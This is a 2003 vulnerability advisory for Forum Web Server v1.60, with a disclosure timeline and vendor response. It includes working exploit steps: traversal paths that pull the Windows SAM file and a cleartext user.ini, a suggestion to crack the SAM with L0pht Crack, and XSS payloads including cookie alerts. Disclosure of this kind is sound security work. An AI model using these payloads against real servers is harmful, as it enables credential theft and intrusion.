Multible vulnerabilities found in Forum Web Server v1.60

[matrix () infowarfare dk]

                           Multible vulnerabilities
                        found in Forum Web Server v1.60
                         http://www.minihttpserver.net
                         
                          Discovered by Dennis Rand
                             www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY
WebForums Server allows you to setup a bulletin board and photo/file 
xchange web service. It offers a built in HTTP engine, internal database 
engine, integrated HTML/Script pages, user management interface, message 
board engine and a secure file Upload/Download option. It is without a doubt 
the easiest and complet all in one Forum Server software you have seen.

It is possible to get access to the server files outside the restricted
area of the server, and make sensitive files public.
Second there is XSS vulnerability in the Forum area.
Third it is possible to steal the username and passwords

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Forum Web Server v.1.60
 
Immune systems:
 * Forum Web Server v.1.61

A command requests allows remote users to break out of restricted 
directories and gain read access to the system directory structure; 
Possibility for getting files from outside restricted areas.
The server is also vulnerabel to XSS and last but not least 
i've disvovered a information leak to get the user database
for the Forum Web Server.


The following transcript demonstrates a sample exploitation of the 
vulnerabilities:
-------------------------------------------------------------------
Traversal:
With in the FileSharing area, press the "Upload new file" button:
Now in the upload field just insert :

\\<vuln host>\c$\winnt\repair\sam._

This will now be uploaded to and area where you can get the sam._
and then use ex. L0pht Crack for breaking the password.

XSS:
When posting or replying to a message in the "Message Forum" it is
possible to use XSS vulnerability both in the Subject and Message

ex. insert this into either subject or Message
<script>alert('I OwN You');</script>
<img%20src=javascript:alert(document.domain)>
<script>alert(document.cookie)</script>
<script>window.open('http://www.infowarfare.dk&apos;)</script>

Information leak:
It is possible by using the Traversal exploit to get the user names and 
passwords 
from the Forum Web Server
simply by "uploading" \\<vuln-host>\c$\program Files\web froums server\user.ini
The Usernames and passwords are in clear text ready to use.
--------------------------------------------------------------------

Detection:
Forum Web Server is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Recived first reply from David yuan (Master@minihttpserver)
We thank you for the information and will fix this issue as soon as possible.



Disclosure timeline:
--------------------
21/02/2003 Found the Vulnerability.
21/02/2003 Reported to Vendor (support () minihttpserver net and 
master () minihttpserver net)
21/02/2003 Vendor reply, they now know of the vulnerabilities
04/03/2003 Fix made public
06/03/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrix () infowarfare dk> Dennis Rand

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. In no event shall we be liable for any damages whatsoever including 
direct, indirect, incidental, consequential, loss of business profits or 
special damages. 





-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/